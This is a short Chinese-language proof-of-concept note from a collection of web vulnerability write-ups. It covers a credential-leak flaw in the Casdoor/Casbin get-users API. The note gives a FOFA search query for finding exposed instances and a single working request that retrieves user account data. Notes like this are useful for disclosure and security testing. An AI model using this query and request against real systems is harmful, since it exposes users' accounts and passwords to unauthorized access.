Awesome-POC/Web应用漏洞/Casbin get-users 账号密码泄漏漏洞.md

31 lines
440 B
Markdown
Raw Normal View History

2022-05-24 17:29:00 +08:00
# Casbin get-users 账号密码泄漏漏洞
## 漏洞描述
Casbin get-users api接口存在账号密码泄漏漏洞攻击者通过漏洞可以获取用户敏感信息
## 漏洞影响
```
Casbin
```
## FOFA
```
title="Casdoor"
```
## 漏洞复现
登录页面
2022-12-05 11:09:28 +08:00
![image-20220524143206718](./images/202205241432780.png)
2022-05-24 17:29:00 +08:00
验证POC
```
/api/get-users?p=123&pageSize=123
```
2022-12-05 11:09:28 +08:00
![image-20220524143215583](./images/202205241432624.png)